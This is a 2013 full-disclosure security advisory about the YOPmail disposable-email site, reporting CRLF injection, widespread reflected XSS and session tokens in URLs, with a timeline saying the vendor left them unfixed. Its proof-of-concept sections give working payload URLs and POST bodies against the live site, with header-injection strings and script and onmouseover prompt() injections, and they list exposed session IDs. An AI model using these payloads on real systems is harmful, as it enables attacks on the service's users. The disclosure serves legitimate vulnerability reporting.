YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL
==================================================================================================================================================


Report-Timeline:
================
2013-06-01:     Researcher Notification 
2013-06-03:     RESPONSE
2013-06-07:     Ask About the issues
2013-06-10:     Vendor Feedback
2013-06-13:     Not Fixed
2013-06-16:     Ask About the Issues
2013-06-27:     Not Fixed / Not Response
2013-06-28:     Full Disclosure


I-VULNERABILITIES
======================

#Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL /

#Vendor:http://www.yopmail.com

#Author:Juan Carlos García (@secnight)

#Follow me 
 http://www.highsec.es
 http://hackingmadrid.blogspot.com
Twitter:@secnight


II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days. 
It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are 

downloadable. There are alternate domains.

Domains

@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.


III-PROOF OF CONCEPT
======================

CRLF INJECTION-HTTP RESPONSE SPLITING
______________________________________

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers 

are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user 

defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks

Attacks
-------

http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717


Multiple CROSS SITE SCRIPTING
_______________________________

The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a 

manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------

Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS..

Affected items
/add-domain.php 
/alternate-domains.php 
/alternate-email-address.php 
/conditions.php 
/contact.php 
/definitions/email-jetable.php 
/definitions/mail-anonyme.php 
/definitions/spam.php 
/donation.php 
/email-anonyme.php 
/email-generator.php 
/en 
/en/add-domain.php 
/en/alternate-domains.php 
/en/alternate-email-address.php 
/en/conditions.php 
/en/contact.php 
/en/definitions 
/en/definitions/email-jetable.php 
/en/definitions/mail-anonyme.php 
/en/definitions/spam.php 
/en/donation.php 
/en/email-anonyme.php 
/en/email-generator.php 
/en/faq.php 
/en/images 
/en/index.php 
/en/plugins.php 
/en/privacy.php 
/en/send-mail.php 
/en/style 
/en/style/pic 
/en/yopmail-chat.php 
/es 
/es/add-domain.php 
/es/alternate-domains.php 
/es/alternate-email-address.php 
/es/conditions.php 
/es/contact.php 
/es/definitions 
/es/definitions/email-jetable.php 
/es/definitions/mail-anonyme.php 
/es/definitions/spam.php 
/es/donation.php 
/es/email-anonyme.php 
/es/email-generator.php 
/es/faq.php 
/es/images 
/es/index.php 
/es/plugins.php 
/es/privacy.php 
/es/send-mail.php 
/es/style 
/es/style/pic 
/es/yopmail-chat.php 
/faq.php 
/fr 
/fr/add-domain.php 
/fr/alternate-domains.php 
/fr/alternate-email-address.php 
/fr/conditions.php 
/fr/contact.php 
/fr/definitions 
/fr/definitions/email-jetable.php 
/fr/definitions/mail-anonyme.php 
/fr/definitions/spam.php 
/fr/donation.php 
/fr/email-anonyme.php 
/fr/email-generator.php 
/fr/faq.php 
/fr/images 
/fr/index.php 
/fr/plugins.php 
/fr/privacy.php 
/fr/send-mail.php 
/fr/style 
/fr/style/pic 
/fr/yopmail-chat.php 
/index.php 
/it 
/it/add-domain.php 
/it/alternate-domains.php 
/it/alternate-email-address.php 
/it/conditions.php 
/it/contact.php 
/it/definitions 
/it/definitions/email-jetable.php 
/it/definitions/mail-anonyme.php 
/it/definitions/spam.php 
/it/donation.php 
/it/email-anonyme.php 
/it/email-generator.php 
/it/faq.php 
/it/images 
/it/index.php 
/it/plugins.php 
/it/privacy.php 
/it/send-mail.php 
/it/style 
/it/style/pic 
/it/yopmail-chat.php 
/pl 
/pl/add-domain.php 
/pl/alternate-domains.php 
/pl/alternate-email-address.php 
/pl/conditions.php 
/pl/contact.php 
/pl/definitions 
/pl/definitions/email-jetable.php 
/pl/definitions/mail-anonyme.php 
/pl/definitions/spam.php 
/pl/donation.php 
/pl/email-anonyme.php 
/pl/email-generator.php 
/pl/faq.php 
/pl/images 
/pl/index.php 
/pl/plugins.php 
/pl/privacy.php 
/pl/send-mail.php 
/pl/style 
/pl/style/pic 
/pl/yopmail-chat.php 
/plugins.php 
/privacy.php 
/ru 
/ru/add-domain.php 
/ru/alternate-domains.php 
/ru/alternate-email-address.php 
/ru/conditions.php 
/ru/contact.php 
/ru/definitions 
/ru/definitions/email-jetable.php 
/ru/definitions/mail-anonyme.php 
/ru/definitions/spam.php 
/ru/donation.php 
/ru/email-anonyme.php 
/ru/email-generator.php 
/ru/faq.php 
/ru/images 
/ru/index.php 
/ru/plugins.php 
/ru/privacy.php 
/ru/send-mail.php 
/ru/style 
/ru/style/pic 
/ru/yopmail-chat.php 
/send-mail.php 
/uk 
/uk/add-domain.php 
/uk/alternate-domains.php 
/uk/alternate-email-address.php 
/uk/conditions.php 
/uk/contact.php 
/uk/definitions 
/uk/definitions/email-jetable.php 
/uk/definitions/mail-anonyme.php 
/uk/definitions/spam.php 
/uk/donation.php 
/uk/email-anonyme.php 
/uk/email-generator.php 
/uk/faq.php 
/uk/images 
/uk/index.php 
/uk/plugins.php 
/uk/privacy.php 
/uk/send-mail.php 
/uk/style 
/uk/style/pic 
/uk/yopmail-chat.php 
/yopmail-chat.php 
/zh 
/zh/add-domain.php 
/zh/alternate-domains.php 
/zh/alternate-email-address.php 
/zh/conditions.php 
/zh/contact.php 
/zh/definitions 
/zh/definitions/email-jetable.php 
/zh/definitions/mail-anonyme.php 
/zh/definitions/spam.php 
/zh/donation.php 
/zh/email-anonyme.php 
/zh/email-generator.php 
/zh/faq.php 
/zh/images 
/zh/index.php 
/zh/plugins.php 
/zh/privacy.php 
/zh/send-mail.php 
/zh/style 
/zh/style/pic 
/zh/yopmail-chat.php 

Method GET
----------

http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec

http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec

http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid

http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E

http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E

http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E

http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E

http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E

http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------

http://www.yopmail.com:80/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-

1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-

dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-

7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt

%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-

0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


SESSION TOKEN IN URL
____________________

This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL. 

URLs could be logged or leaked via the Referer header.

Affected items
--------------

/cr.php (78a3a31e275b316f36665b35eb4bfe21) 
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1) 
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3) 
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca) 
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 

Examples

Method GET
----------

http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&

http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst



IV. CREDITS
-------------------------

This vulnerabilities has been discovered
by Juan Carlos García(@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.